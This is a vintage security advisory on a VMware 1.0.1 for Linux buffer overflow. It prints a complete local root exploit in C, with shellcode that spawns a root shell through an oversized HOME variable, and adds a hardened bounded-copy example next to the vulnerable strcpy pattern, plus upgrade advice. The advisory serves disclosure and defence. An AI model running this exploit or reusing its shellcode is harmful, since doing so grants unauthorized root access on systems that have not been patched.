COMMAND
VMware
SYSTEMS AFFECTED
VMware for Linux 1.0.1 and previous
PROBLEM
The security hole allows a buffer overrun attack against VMware
for Linux that gives an unprivileged local user root access to the machine.
VMware v1.0.1 is a software product by VMware, Inc. that creates a
virtual machine in which you can install multiple operating
systems without repartitioning or formatting your hard drive.
Team Asylum has found multiple buffer overflows in VMware v1.0.1
for Linux; earlier versions contain the same overflows. Any local
user can exploit them to gain root access. funkySh posted the
following code that exploits the vulnerability:
/*
* VMware v1.0.1 root sploit
* funkySh 02/07/99
*
* 1. Redhat 5.2 2.2.9 offset 800-1100
* 2. offset 1600-2200
* 1. Slackware 3.6 2.2.9 offset 0
* 2. offset ?
*
* [ 1 - started from xterm on localhost ]
* [ 2 - started from telnet, with valid display ]
*/
#include <stdio.h>
#include <stdlib.h>   /* atoi, setenv */
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */
char code[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* execve("/bin/sh") */
#define BUFFER 1032
#define NOP 0x90
#define RET_ADDR 0xbfffdf50
#define PATH "/usr/local/bin/vmware"
char buf[BUFFER];
int main(int argc, char * argv[])
{
    int i, offset = 0;
    if(argc > 1) offset = atoi(argv[1]);   /* return-address offset, see header */
    memset(buf,NOP,BUFFER);                /* fill the buffer with a NOP sled */
    memcpy(buf+800,code,strlen(code));     /* place the shellcode at offset 800 */
    for(i=854+2;i<BUFFER-2;i+=4)           /* pad the tail with the return address */
        *(int *)&buf[i]=RET_ADDR+offset;
    setenv("HOME", buf, 1);                /* oversized HOME value triggers the overrun */
    execl(PATH,"vmware","-display","127.0.0.1:0",(char *)0);
    /* change IP if required */
    return 0;
}
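The exploit above reaches the overrun through the HOME environment variable, which points at the underlying coding defect: copying an attacker-controlled string into a fixed-size buffer without a length check. The following is an added example, not part of the advisory and not VMware's code, that shows that vulnerable shape beside a hardened loader which rejects oversized values outright. The buffer size HOME_MAX and the helper names are constructed for illustration; the advisory does not disclose VMware's internal layout.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size buffer, a constructed value for illustration;
   the advisory does not disclose VMware's internal buffer sizes. */
#define HOME_MAX 256

/* Vulnerable shape (assumed pattern): an unbounded copy of an
   attacker-controlled environment variable into a fixed buffer. In a
   setuid-root program, a long HOME value overruns dst and corrupts the
   stack, which is what the advisory's exploit relies on. */
void load_home_unsafe(char dst[HOME_MAX], const char *home)
{
    strcpy(dst, home);   /* no length check */
}

/* Hardened form: refuse any value that does not fit, counting the
   terminating NUL, and report the rejection rather than truncating
   silently. Returns 0 on success, -1 on rejection. */
int load_home_safe(char *dst, size_t dstlen, const char *home)
{
    size_t n;

    if (dst == NULL || dstlen == 0 || home == NULL)
        return -1;
    n = strlen(home);
    if (n >= dstlen)            /* would overflow, or leave no room for NUL */
        return -1;
    memcpy(dst, home, n + 1);   /* copy including the terminator */
    return 0;
}

/* Returns 1 if value fits the hypothetical HOME buffer, 0 otherwise. */
int home_fits(const char *value)
{
    char buf[HOME_MAX];
    return load_home_safe(buf, sizeof buf, value) == 0;
}

/* Builds a constructed HOME value of len bytes ('A' repeated) and reports
   whether the hardened loader accepts it, so the check can be exercised
   without touching the real environment. Returns -1 on allocation failure. */
int home_fits_len(size_t len)
{
    char *v = malloc(len + 1);
    int ok;

    if (v == NULL)
        return -1;
    memset(v, 'A', len);
    v[len] = '\0';
    ok = home_fits(v);
    free(v);
    return ok;
}

int main(void)
{
    char buf[HOME_MAX];

    /* Both loaders behave the same on a normal value. */
    load_home_unsafe(buf, "/home/alice");
    printf("unsafe loader copied: %s\n", buf);
    printf("safe loader accepts /home/alice: %d\n", home_fits("/home/alice"));

    /* Only the hardened loader handles an oversized value; 1032 is the
       BUFFER size used by the advisory's exploit. */
    printf("255-byte HOME accepted: %d\n", home_fits_len(255));
    printf("256-byte HOME accepted: %d\n", home_fits_len(256));
    printf("1032-byte HOME accepted: %d\n", home_fits_len(1032));
    return 0;
}
```

The rejection path matters more than the copy itself: a setuid program that silently truncates may still behave unexpectedly later, whereas refusing the value (and logging it) makes an attempted overrun visible.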
SOLUTION
All users are encouraged to upgrade to VMware v1.0.2. You may
download it directly from http://www.vmware.com.